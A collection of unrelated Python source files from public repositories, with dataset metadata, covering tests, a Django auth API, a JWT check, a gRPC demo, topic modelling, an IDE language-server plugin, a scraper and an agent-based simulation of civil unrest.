self.assertEqual(expected_result, mpp._get_average_for_row(row, 1))\n\n def test_get_output_file_name_with_suffix(self):\n self.assertEqual('./test_suffix.csv', mpp._get_output_file_name_with_suffix('./test.csv', '_suffix'))\n self.assertEqual('/this/is/a/absolute/path/to/a/file_suffix.csv',\n mpp._get_output_file_name_with_suffix('/this/is/a/absolute/path/to/a/file.csv', '_suffix'))\n\n\n def test_get_interpolated_rows_1_second_gap(self):\n row1 = ['2019-11-19 16:56:32 CEST','12','10000000000','8','0.8','1.02','1.18']\n row2 = ['2019-11-19 16:56:34 CEST','10','11000000000','8','0.8','1.00','1.20']\n\n expected = [['2019-11-19 16:56:33 CEST', '11.0', '10500000000.0', '8.0', '0.8', '1.01', '1.19']]\n actual = mpp._get_interpolated_rows(row1, row2)\n\n self.assertEqual(expected, actual)\n\n def test_get_interpolated_rows_2_second_gap(self):\n row1 = ['2019-11-19 16:56:32 CEST','12','10000000000','8','0.8','1.02','1.18']\n row2 = ['2019-11-19 16:56:35 CEST','9','11500000000','8','1.1','1.02','1.21']\n\n expected = [\n ['2019-11-19 16:56:33 CEST', '11.0', '10500000000.0', '8.0', '0.9', '1.02', '1.19'],\n ['2019-11-19 16:56:34 CEST', '10.0', '11000000000.0', '8.0', '1.0', '1.02', '1.20'] \n ]\n actual = mpp._get_interpolated_rows(row1, row2)\n\n \n def test_get_metrics_on_seconds_interval(self):\n mpp.get_metrics_on_seconds_interval('./data/test_metrics.csv')\n\n output_file_written = os.path.exists('./data/test_metrics_seconds.csv')\n\n self.assertTrue(output_file_written)\n self.assertTrue(filecmp.cmp('./data/test_metrics_seconds.csv', './data/test_metrics_seconds_expected.csv'))\n os.remove('./data/test_metrics_seconds.csv')\n \n def test_fill_metrics_missing_seconds_using_linear_interpolation(self):\n mpp.fill_metrics_missing_seconds_using_linear_interpolation('./data/test_metrics2.csv')\n\n output_file_written = os.path.exists('./data/test_metrics2_filled.csv')\n self.assertTrue(output_file_written)\n self.assertTrue(filecmp.cmp('./data/test_metrics2_filled.csv', './data/test_metrics2_expected.csv'))\n # os.remove('./data/test_metrics_seconds.csv')\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Context-Aware-Monitoring/Efficient-Stream-Monitoring","sub_path":"tests/test_metric_pre_processing.py","file_name":"test_metric_pre_processing.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"22807046947","text":"#!/usr/bin/env python3\n\n#10 Ingresar 3 valores entre 0 y 100 y generar un gráfico de torta (usar 8.3)\n\nimport turtle\n\nt=turtle.Turtle()\nu=turtle.Turtle()\n\ndef CrearPoligono (radio,porcentaje,ancho,color=\"black\"):\n## t.speed(1)\n arco=0\n arco=(porcentaje*360/100)\n x=t.xcor()\n y=t.ycor()\n t.lt(90)\n t.penup()\n t.setposition(x,y)\n t.pendown()\n t.pencolor(\"black\")\n t.fillcolor(color) \n t.width (ancho)\n t.begin_fill()\n t.fd(radio)\n t.rt(180-arco)\n t.fd(radio)\n t.penup()\n t.setposition(x,y)\n t.pendown()\n t.lt(90-arco)\n t.circle(radio,arco)\n t.end_fill() \n t.hideturtle()\n\n\ncolor=[\"blue\",\"red\",\"green\"]\nxw=-50\nyw=-40\nfor b in range (3):\n porcentaje=(int(input(\"Ingrese porcentaje a graficar: \")))\n CrearPoligono (100,porcentaje,3,color[b])\n u.penup()\n u.setposition(xw+(50*b),yw)\n u.pendown()\n u.pencolor(color[b])\n u.write(str(porcentaje)+\"%\")\n u.hideturtle()\n\n\n##CrearPoligono (100,60,5,\"blue\")\n##CrearPoligono (100,80,5,\"green\")\n##CrearPoligono (100,120,5,\"red\")\n##CrearPoligono (100,100,5,\"orange\")\n \n","repo_name":"DamianNery/Tecnicas-De-Programacion","sub_path":"4Abril/13/GraficoTorta.py","file_name":"GraficoTorta.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"5073977924","text":"import sys\n\nimport extern as ext\n\n\ndef str_diff(str1, str2):\n if len(str1) != len(str2):\n print('problem3: str_diff: str1 length {} not equal to str2 length {}'.format(len(str1), len(str2)))\n return sys.maxsize\n\n diff_count = 0\n for i in range(len(str1)):\n if str1[i] != str2[i]:\n diff_count += 1\n\n return diff_count\n\n\ndef run():\n with open(ext.FilenameIn) as f_in:\n pattern = f_in.readline().strip()\n genome = f_in.readline().strip()\n d = int(f_in.readline())\n\n positions = []\n\n for i in range(len(genome) - len(pattern) + 1):\n genome_window = genome[i:i + len(pattern)]\n d_curr = str_diff(pattern, genome_window)\n if d_curr <= d:\n positions.append(str(i))\n\n with open(ext.FilenameOut, 'w') as f_out:\n f_out.write(' '.join(positions))\n","repo_name":"DeSerg/mipt-solutions","sub_path":"Term10/bioinformatics_tasks/problems/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"71021285173","text":"from django.contrib.auth import get_user_model\nfrom django.utils import timezone\nfrom rest_framework import generics, status, permissions\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom member.serializers import UserSerializer\nUserModel = get_user_model()\n\n\nclass TokenLoginView(APIView):\n \"\"\"\n 토큰으로 로그인\n \"\"\"\n\n permission_classes = []\n\n def post(self, request):\n r_token = request.data.get('token', None)\n\n if not r_token:\n return Response({'detail': '토큰이 없습니다.'}, status=status.HTTP_400_BAD_REQUEST)\n\n token = Token.objects.filter(key=r_token).first()\n if not token:\n return Response({'detail': '토큰이 유효하지 않습니다.'}, status=status.HTTP_404_NOT_FOUND)\n\n user = UserModel.objects.filter(id=token.user_id).first()\n if not user:\n return Response({'detail': '존재하지 않는 사용자입니다.'}, status=status.HTTP_404_NOT_FOUND)\n\n user.update_date = timezone.now()\n user.save()\n\n user_serializer = UserSerializer(user, context={'request': request})\n context = {\n 'token': token.key,\n 'user': user_serializer.data\n }\n\n return Response(context, status=status.HTTP_200_OK)\n\n\nclass UserLogoutView(APIView):\n \"\"\"\n 사용자 로그아웃\n \"\"\"\n\n permission_classes = (\n permissions.IsAuthenticated,\n )\n\n def post(self, request):\n r_user = request.user\n user = UserModel.objects.filter(id=r_user.id).first()\n if not user:\n return Response({'detail': '존재하지 않는 사용자입니다.'}, status=status.HTTP_400_BAD_REQUEST)\n \n try:\n request.user.auth_token.delete()\n except Exception as error:\n message = '{}'.format(error)\n return Response({'detail': message}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n return Response({'result': 'ok'}, status=status.HTTP_200_OK)\n","repo_name":"zinns58/example-django-test","sub_path":"project/member/views/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"70869602613","text":"from datetime import datetime\nfrom config import SECRET_KEY, ALGORITHM\nimport jwt\nfrom jwt.exceptions import PyJWTError\nfrom fastapi import HTTPException, Depends, status\nfrom fastapi.security import HTTPAuthorizationCredentials, HTTPBearer\n\n\nsecurity_scheme = HTTPBearer()\n\ndef verify_jwt_token(token: str):\n try:\n payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM])\n expiration = datetime.fromtimestamp(payload[\"exp\"])\n if datetime.now() > expiration:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Token has expired\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n else:\n return payload\n except PyJWTError:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Invalid authentication credentials\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n\nasync def get_current_user(token: HTTPAuthorizationCredentials = Depends(security_scheme)):\n return verify_jwt_token(token.credentials)\n","repo_name":"a7744hsc/DFChat","sub_path":"backend/utils/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"16708959524","text":"from concurrent import futures\n\nimport grpc\nfrom flask import Flask\n\nimport proto_example_pb2\nimport proto_example_pb2_grpc\n\napp = Flask(__name__)\n\n\nclass GreetingServicer(proto_example_pb2_grpc.GreetingServiceServicer):\n def SayHello(self, request, context):\n response = proto_example_pb2.Response()\n response.message = f\"Hello, {request.message}!\"\n return response\n\n\nserver = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\nproto_example_pb2_grpc.add_GreetingServiceServicer_to_server(GreetingServicer(), server)\nserver.add_insecure_port(\"[::]:50051\")\n\n\n@app.route(\"/\")\ndef index():\n return \"gRPC Server is running!\"\n\n\nif __name__ == \"__main__\":\n server.start()\n app.run(host=\"0.0.0.0\", port=5001)\n","repo_name":"surya18091997/personal","sub_path":"grpc_server.py","file_name":"grpc_server.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"28794411371","text":"import time\n\nfrom osbrain import Agent\nfrom osbrain import run_agent\nfrom osbrain import run_nameserver\n\n\nclass Greeter(Agent):\n def on_init(self):\n self.bind('PUSH', alias='main')\n\n def hello(self, name):\n self.send('main', 'Hello, %s!' % name)\n\n\nclass Bob(Agent):\n def custom_log(self, message):\n self.log_info('Received: %s' % message)\n\n\nif __name__ == '__main__':\n\n # System deployment\n ns = run_nameserver()\n alice = run_agent('Alice', base=Greeter)\n bob = run_agent('Bob', base=Bob)\n\n # System configuration\n bob.connect(alice.addr('main'), handler='custom_log')\n\n # Send messages\n for _ in range(3):\n alice.hello('Bob')\n time.sleep(1)\n\n ns.shutdown()\n","repo_name":"opensistemas-hub/osbrain","sub_path":"examples/push_pull_inherit.py","file_name":"push_pull_inherit.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":172,"dataset":"github-code","pt":"21"}
+{"seq_id":"21484473653","text":"import os\nimport string\n\nimport numpy as np\nimport pandas as pd\n\nimport nltk\nfrom nltk import word_tokenize, sent_tokenize, corpus\nfrom nltk.stem import PorterStemmer, WordNetLemmatizer\n\nimport gensim\nfrom gensim.models import LdaModel\nfrom gensim.corpora.dictionary import Dictionary\n\n\nnltk.download('popular')\n\n\nclass Lda2vec:\n def __init__(self, tokenizer=None, num_topics=50):\n '''\n :parameter tokenizer: tokenizer function, default nltk word tokenizer\n :parameter num_topics: number of topics, default 50\n '''\n self.num_topics = num_topics\n self.tokenizer = tokenizer if tokenizer is not None else self.__tokenizer\n\n self.dictionary = None\n self.lda = None\n self.__is_fitted = False\n\n\n def __check_fitted(self):\n if not self.__is_fitted:\n raise RuntimeError('Model has not been fitted, call fit(input_corpus) first.')\n\n\n def __tokenizer(self, text):\n tokens = []\n porter_stemmer = PorterStemmer()\n lemmatizer = WordNetLemmatizer()\n stop_words = set(corpus.stopwords.words('english'))\n\n text = ''.join(char for char in text if char not in string.punctuation)\n\n for sent in sent_tokenize(text, language='english'):\n for word in word_tokenize(sent, language='english'):\n if len(word) < 2 or word.lower() in stop_words:\n continue\n\n word = lemmatizer.lemmatize(word)\n # word = porter_stemmer.stem(word)\n tokens.append(word)\n\n return tokens\n\n\n def fit(self, input_tokens=None, input_strings=None):\n '''\n :parameter input_strings: iterable of strings,\n e.g. ['i love cs', 'i hate statistics']\n :parameter input_tokens: iterable of iterable of tokens,\n e.g. [['i', 'love', 'cs'], ['i', 'hate', 'statistics']]\n '''\n\n if input_strings is None and input_tokens is None:\n raise RuntimeError('Either input_tokens or input_strings must not be None.')\n\n if not input_tokens:\n input_tokens = list(map(self.tokenizer, input_strings))\n\n self.dictionary = Dictionary(input_tokens)\n self.corpus = [self.dictionary.doc2bow(tokens) for tokens in input_tokens]\n self.lda = LdaModel(self.corpus, num_topics=self.num_topics, alpha='auto', eval_every=5)\n self.__is_fitted = True\n\n\n def get_doc_vec(self, words):\n '''\n :parameter words: iterable of tokens, e.g. ['i', 'love', 'cs']\n :returns np.ndarray of shape (num_topics, ) where each value represents the prob of the words being in that topic\n '''\n self.__check_fitted()\n vec = np.zeros(self.num_topics, )\n bow = self.dictionary.doc2bow(words)\n for i, p in self.lda[bow]:\n vec[i] = p\n return vec\n\n\nif __name__ == '__main__':\n data_dir = '../data/'\n df = pd.read_csv(os.path.join(data_dir, 'fulltrain.csv'), names=('Verdict', 'Text'))\n\n model = Lda2vec(num_topics=10)\n model.fit(input_strings=df['Text'])\n x = model.get_doc_vec('i love cs'.split())\n","repo_name":"careycwang/CS4248-Fake-News-Detection","sub_path":"src/Lda2vec.py","file_name":"Lda2vec.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"28124294712","text":"import sys\n\nLIMIT = 5 # 1000\n\n\ndef convert_to_intlist(line):\n return [int(elem) for elem in line.split()]\n\n\ndef minimum_steps_to_make_array_sorted(array, n):\n table = [[0] * LIMIT for _ in range(n)]\n elem = array[0]\n for x in range(1, LIMIT+1):\n table[0][x-1] = abs(x - elem)\n\n for ix in range(1, n):\n elem = array[ix]\n m = table[ix-1][0]\n for y in range(1, LIMIT+1):\n m = min(m, table[ix-1][y-1])\n table[ix][y-1] = m + abs(y - elem)\n return min(table[n-1][x-1] for x in range(1, LIMIT+1))\n\n\ndef main():\n reader = sys.stdin\n n = int(next(reader))\n array = convert_to_intlist(next(reader))\n result = minimum_steps_to_make_array_sorted(array, n)\n print(result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ghostrider77/competitive-programming-skills","sub_path":"Python/21_make_it_sorted.py","file_name":"21_make_it_sorted.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"17443577003","text":"import gi\nimport os\n\nfrom gi.repository import GLib\nfrom gi.repository import Gio\nfrom gi.repository import GObject\nfrom gi.repository import Ide\n\nDEV_MODE = False\n\nclass RlsService(Ide.Object):\n _client = None\n _has_started = False\n _supervisor = None\n _monitor = None\n\n @classmethod\n def from_context(klass, context):\n return context.ensure_child_typed(RlsService)\n\n @GObject.Property(type=Ide.LspClient)\n def client(self):\n return self._client\n\n @client.setter\n def client(self, value):\n self._client = value\n self.notify('client')\n\n def do_parent_set(self, parent):\n \"\"\"\n After the context has been loaded, we want to watch the project\n Cargo.toml for changes if we find one. That will allow us to\n restart the process as necessary to pick up changes.\n \"\"\"\n if parent is None:\n return\n\n context = self.get_context()\n workdir = context.ref_workdir()\n cargo_toml = workdir.get_child('Cargo.toml')\n\n if cargo_toml.query_exists():\n try:\n self._monitor = cargo_toml.monitor(0, None)\n self._monitor.set_rate_limit(5 * 1000) # 5 Seconds\n self._monitor.connect('changed', self._monitor_changed_cb)\n except Exception as ex:\n Ide.debug('Failed to monitor Cargo.toml for changes:', repr(ex))\n\n def _monitor_changed_cb(self, monitor, file, other_file, event_type):\n \"\"\"\n This method is called when Cargo.toml has changed. We need to\n cancel any supervised process and force the language server to\n restart. Otherwise, we risk it not picking up necessary changes.\n \"\"\"\n if self._supervisor is not None:\n subprocess = self._supervisor.get_subprocess()\n if subprocess is not None:\n subprocess.force_exit()\n\n def do_stop(self):\n \"\"\"\n Stops the Rust Language Server upon request to shutdown the\n RlsService.\n \"\"\"\n if self._monitor is not None:\n monitor, self._monitor = self._monitor, None\n if monitor is not None:\n monitor.cancel()\n\n if self._supervisor is not None:\n supervisor, self._supervisor = self._supervisor, None\n supervisor.stop()\n\n def _ensure_started(self):\n \"\"\"\n Start the rust service which provides communication with the\n Rust Language Server. We supervise our own instance of the\n language server and restart it as necessary using the\n Ide.SubprocessSupervisor.\n\n Various extension points (diagnostics, symbol providers, etc) use\n the RlsService to access the rust components they need.\n \"\"\"\n # To avoid starting the `rls` process unconditionally at startup,\n # we lazily start it when the first provider tries to bind a client\n # to its :client property.\n if not self._has_started:\n self._has_started = True\n\n # Setup a launcher to spawn the rust language server\n launcher = self._create_launcher()\n launcher.set_clear_env(False)\n sysroot = self._discover_sysroot()\n if sysroot:\n launcher.setenv(\"SYS_ROOT\", sysroot, True)\n launcher.setenv(\"LD_LIBRARY_PATH\", os.path.join(sysroot, \"lib\"), True)\n if DEV_MODE:\n launcher.setenv('RUST_LOG', 'debug', True)\n\n # Locate the directory of the project and run rls from there.\n workdir = self.get_context().ref_workdir()\n launcher.set_cwd(workdir.get_path())\n\n # If rls was installed with Cargo, try to discover that\n # to save the user having to update PATH.\n path_to_rls = os.path.expanduser(\"~/.cargo/bin/rls\")\n if os.path.exists(path_to_rls):\n old_path = os.getenv('PATH')\n new_path = os.path.expanduser('~/.cargo/bin')\n if old_path is not None:\n new_path += os.path.pathsep + old_path\n launcher.setenv('PATH', new_path, True)\n else:\n path_to_rls = \"rls\"\n\n # Setup our Argv. We want to communicate over STDIN/STDOUT,\n # so it does not require any command line options.\n launcher.push_argv(path_to_rls)\n\n # Spawn our peer process and monitor it for\n # crashes. We may need to restart it occasionally.\n self._supervisor = Ide.SubprocessSupervisor()\n self._supervisor.connect('spawned', self._rls_spawned)\n self._supervisor.set_launcher(launcher)\n self._supervisor.start()\n\n def _rls_spawned(self, supervisor, subprocess):\n \"\"\"\n This callback is executed when the `rls` process is spawned.\n We can use the stdin/stdout to create a channel for our\n LspClient.\n \"\"\"\n stdin = subprocess.get_stdin_pipe()\n stdout = subprocess.get_stdout_pipe()\n io_stream = Gio.SimpleIOStream.new(stdout, stdin)\n\n if self._client:\n self._client.stop()\n self._client.destroy()\n\n self._client = Ide.LspClient.new(io_stream)\n self.append(self._client)\n self._client.add_language('rust')\n self._client.start()\n self.notify('client')\n\n def _create_launcher(self):\n \"\"\"\n Creates a launcher to be used by the rust service. This needs\n to be run on the host because we do not currently bundle rust\n inside our flatpak.\n\n In the future, we might be able to rely on the runtime for\n the tooling. Maybe even the program if flatpak-builder has\n prebuilt our dependencies.\n \"\"\"\n flags = Gio.SubprocessFlags.STDIN_PIPE | Gio.SubprocessFlags.STDOUT_PIPE\n if not DEV_MODE:\n flags |= Gio.SubprocessFlags.STDERR_SILENCE\n launcher = Ide.SubprocessLauncher()\n launcher.set_flags(flags)\n launcher.set_cwd(GLib.get_home_dir())\n launcher.set_run_on_host(True)\n return launcher\n\n def _discover_sysroot(self):\n \"\"\"\n The Rust Language Server needs to know where the sysroot is of\n the Rust installation we are using. This is simple enough to\n get, by using `rust --print sysroot` as the rust-language-server\n documentation suggests.\n \"\"\"\n for rustc in ['rustc', os.path.expanduser('~/.cargo/bin/rustc')]:\n try:\n launcher = self._create_launcher()\n launcher.push_args([rustc, '--print', 'sysroot'])\n subprocess = launcher.spawn()\n _, stdout, _ = subprocess.communicate_utf8()\n return stdout.strip()\n except:\n pass\n\n @classmethod\n def bind_client(klass, provider):\n \"\"\"\n This helper tracks changes to our client as it might happen when\n our `rls` process has crashed.\n \"\"\"\n context = provider.get_context()\n self = RlsService.from_context(context)\n self._ensure_started()\n self.bind_property('client', provider, 'client', GObject.BindingFlags.SYNC_CREATE)\n\nclass RlsDiagnosticProvider(Ide.LspDiagnosticProvider, Ide.DiagnosticProvider):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsCompletionProvider(Ide.LspCompletionProvider, Ide.CompletionProvider):\n def do_load(self, context):\n RlsService.bind_client(self)\n\n def do_get_priority(self, context):\n # This provider only activates when it is very likely that we\n # want the results. So use high priority (negative is better).\n return -1000\n\nclass RlsRenameProvider(Ide.LspRenameProvider, Ide.RenameProvider):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsSymbolResolver(Ide.LspSymbolResolver, Ide.SymbolResolver):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsHighlighter(Ide.LspHighlighter, Ide.Highlighter):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsFormatter(Ide.LspFormatter, Ide.Formatter):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsHoverProvider(Ide.LspHoverProvider, Ide.HoverProvider):\n def do_prepare(self):\n self.props.category = 'Rust'\n self.props.priority = 200\n RlsService.bind_client(self)\n","repo_name":"acidburn0zzz/gnome-builder","sub_path":"src/plugins/rls/rls_plugin.py","file_name":"rls_plugin.py","file_ext":"py","file_size_in_byte":8408,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"21544538572","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\nurl = raw_input('type Url:')\r\n#url = 'http://www.meitulu.com/item/8696.html'\r\n#http://www.meitulu.com/item/3499.html\r\nress = requests.get(url)\r\nress.encoding = 'utf-8'\r\nsoup = BeautifulSoup(ress.text,'html.parser')\r\n\r\nfor link in soup.select('a'):\r\n item = 'http://www.meitulu.com/item/'\r\n aa = link.get('href')\r\n if aa[0:28] == item:\r\n ress2 = requests.get(aa)\r\n ress2.encoding = 'utf-8'\r\n soup2 = BeautifulSoup(ress2.text,'html.parser')\r\n #print (soup2)\r\n #soup2 = soup2.find_all('img') \r\n soup2 = soup2.find_all(\"img\",class_=\"content_img\")\r\n for list in soup2: \r\n linkk = list.get('src')\r\n print (linkk)\r\n\r\n\r\n\r\n","repo_name":"zxcke/GetPic","sub_path":"getlist--.py","file_name":"getlist--.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"10634035675","text":"from src.mobile.npc.player.player import Player\nfrom src.mobile.npc.mobs.merchant import Merchant\nfrom src.equipment.items import glasses\nfrom src.equipment.weapons import player_knife\n\n\ndef test_init(player):\n assert player.name == \"Vasiliy\"\n\n\ndef test_heal(player):\n player.max_hp = 20\n player.hp = 18\n player.heal()\n assert player.hp == 20\n\n\ndef test_do_showshopitems(world):\n player = world.add(Player('Petya'), (0, 0))\n player.showshopitems()\n assert player.last_happend == 'Petya спросил никого о торгах'\n\n m = world.add(Merchant(), (0, 10)).start_equip()\n player.showshopitems()\n assert player.last_happend == 'Petya спросил никого о торгах'\n\n world.add(Merchant(), (0, 1)).start_equip()\n player.showshopitems()\n assert player.last_happend != 'Petya спросил никого о торгах'\n\n\ndef test_do_share(world):\n p1 = Player('Штирлиц')\n p1_inv_before = p1.inventory\n p1.position = (10, 0)\n p2 = Player('Исаев')\n p2_inv_before = p2.inventory\n p2.position = (0, 0)\n world.players[(0, 0)] = p2\n p1.world = world\n p1.inventory += [glasses()]\n p1.share('Исаев', 'очки')\n assert p1.last_happend == 'Штирлиц слишком далеко от Исаев'\n assert p2.inventory == p2_inv_before\n\n p1.position = (0, 0)\n p1.share('Исаев', 'очки')\n assert p1.last_happend == 'Штирлиц передал очки в руки Исаев'\n assert p2.inventory[-1].name == 'очки'\n assert len(p1.inventory) == len(p1_inv_before)\n\n p1.share('Исаев', 'очки')\n assert p1.last_happend == \"Штирлиц не может дать очки в руки Исаев\"\n\n\ndef test_do_equip(player):\n player.inventory = [player_knife()]\n assert player.equipment['основное'] is None\n player.equip('меч')\n assert player.equipment['основное'].name == 'меч'\n assert player.equipment['основное'].user == player\n","repo_name":"arovesto/underdanger","sub_path":"test/player_test.py","file_name":"player_test.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
+{"seq_id":"19918982253","text":"#!/usr/bin/env python3\nimport matplotlib.pyplot as plt\nplt.style.use('paper')\nimport numpy\n\ndef plot():\n training_seen, train_losses = numpy.genfromtxt('training_results.txt', skip_header = 1, usecols = (0,1)).T\n test_seen, test_losses, acc = numpy.genfromtxt('test_result.txt', skip_header = 1, usecols = (0,1,2)).T\n fig, ax = plt.subplots()\n ax2 = ax.twinx()\n lns1 = ax.plot(training_seen, train_losses, label = 'train losses')\n lns2 = ax.plot(test_seen, test_losses, 'o', label = 'test losses')\n lns3 = ax2.plot(test_seen, acc, 'o-', color = 'C2', label = 'accuracy')\n lns = lns1 + lns2 + lns3\n labs = [l.get_label() for l in lns]\n ax.set_xlabel('Number of samples seen')\n ax.set_ylabel('Loss')\n ax2.set_ylabel('accuracy (%)')\n ax.legend(lns, labs, loc = 'center right')\n fig.savefig('training_result.png', dpi = 600)\n\n\nif __name__ == \"__main__\":\n plot()\n","repo_name":"SamarthSingh2001/LicencePI","sub_path":"plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"30073253429","text":"name = input(\"Enter file:\")\nif len(name) < 1 : name = \"mbox-short.txt\"\nhandle = open(name)\ncounts = dict()\nfor line in handle :\n if line.startswith(\"From:\") :\n continue\n elif line.startswith(\"From\") :\n words = line.split()\n words = words[5]\n words = words[0:2]\n counts[words] = counts.get(words,0) + 1\n\nfor k,v in sorted(counts.items()) :\n print(k,v)\n","repo_name":"rahamanankit/my-python-codes","sub_path":"tuples1.py","file_name":"tuples1.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"71377962293","text":"\nimport matplotlib.pyplot as plt\nimport importlib\nimport numpy as np\nimport pandas as pd\nfrom scipy.signal import find_peaks\nimport sys\nimport seaborn as sns\n\nfrom epstein_civil_violence.agent import Citizen, Cop\nfrom epstein_civil_violence.model import EpsteinCivilViolence\n\nimport time\n\nlegitimacy = \"Global\" # choose between \"Fixed\",\"Global\",\"Local\"\nnetwork = \"Barabasi\" # Choose between \"Barabasi\", \"Renyi\" and Small-world\nmax_iters = 200 # Choose for how many iterations you want the model to run\n\n\nstart = time.time()\nmodel = EpsteinCivilViolence(height=40, \n width=40, \n citizen_density=.7, \n cop_density=0.04, \n citizen_vision=7, \n cop_vision=7, \n legitimacy=.82, \n max_jail_term=30, \n max_iters=max_iters, \n smart_cops = False,\n legitimacy_kind = legitimacy, \n max_fighting_time=1,\n network = network,\n ) \nmodel.run_model()\n\n# Showing the time it takes to run the model\nfinish = time.time()\nprint(\"Time =\",finish-start)\n\n# Getting the data from the data collector\nmodel_out = model.datacollector.get_model_vars_dataframe()\nagent_out = model.datacollector.get_agent_vars_dataframe()\n\n# Shows the amount of active citizens and statistics\nprint(\"Mean amount of active citizens per step = \",model_out[\"Active\"].mean())\nprint(\"Std of amount of active citizens per step = \",model_out[\"Active\"].std())\nprint(\"Maximum of amount of active citizens in a time step = \",model_out[\"Active\"].max())\n\n# line 59 - 78 give back measured properties of the model\npeaks, _ = find_peaks(model_out[\"Active\"], height=50)\nprint(\"Indices of peaks:\", peaks, \"Amount:\", len(peaks))\n\nactives_list = model_out[\"Active\"].to_list()\nfor peak in peaks:\n print(\"Peak of \", actives_list[peak], \"citizens\")\n\npeak_intervals = []\nif len(peaks)>1:\n for i in range(len(peaks)-1):\n peak_intervals.append(peaks[i+1] - peaks[i])\nprint(\"Peak intervals = \",peak_intervals)\n\ntime_between = []\ntime = 0\ntotal_active = 0\n\ncount1, count2 = False, False\nfor i in range(1,len(actives_list)-1):\n if actives_list[i] < 50 and actives_list[i+1] >= 50:\n count1 = False\n time_between.append(time-1)\n time = 0\n if actives_list[i] >= 50 and actives_list[i+1] < 50:\n count1 = True\n if count1 == True:\n time += 1\n\nprint(\"Times of inter-outerbursts\", time_between)\n\n# Makes a plot of the state of the citizens\nax = model_out[[\"Quiescent\",\"Active\", \"Jailed\", \"Fighting\"]].plot()\nax.set_title('Citizen Condition Over Time')\nax.set_xlabel('Step')\nax.set_ylabel('Number of Citizens')\n_ = ax.legend(bbox_to_anchor=(1.35, 1.025))\nplt.tight_layout()\n\nplt.show()\n\n# Makes a plot of perceived legitimacy\nif legitimacy != \"Local\":\n ax = model_out[[\"Legitimacy\"]].plot()\n ax.set_title('Citizen Condition Over Time')\n ax.set_xlabel('Step')\n ax.set_ylabel('Number of Citizens')\n _ = ax.legend(bbox_to_anchor=(1.35, 1.025))\n plt.tight_layout()\n plt.show()\n\n\nprint(agent_out[[\"breed\",\"Legitimacy\"]].filter(like='1040', axis = 0 ).head())\nprint(agent_out[[\"breed\",\"Legitimacy\"]].filter(like='1041', axis = 0 ).head())\nprint(agent_out[[\"breed\",\"Legitimacy\"]].filter(like='1042', axis = 0 ).head())\n\nif legitimacy == \"Local\":\n ax = agent_out[\"Legitimacy\"].filter(like='1040', axis = 0 ).plot()\n ax.set_title('Citizen Condition Over Time')\n ax.set_xlabel('Step')\n ax.set_ylabel('Number of Citizens')\n _ = ax.legend(bbox_to_anchor=(1.35, 1.025))\n \n plt.tight_layout()\n plt.show()","repo_name":"DCCdelang/ABM","sub_path":"epstein_civil_violence_Normal+Network Grid/model_run.py","file_name":"model_run.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
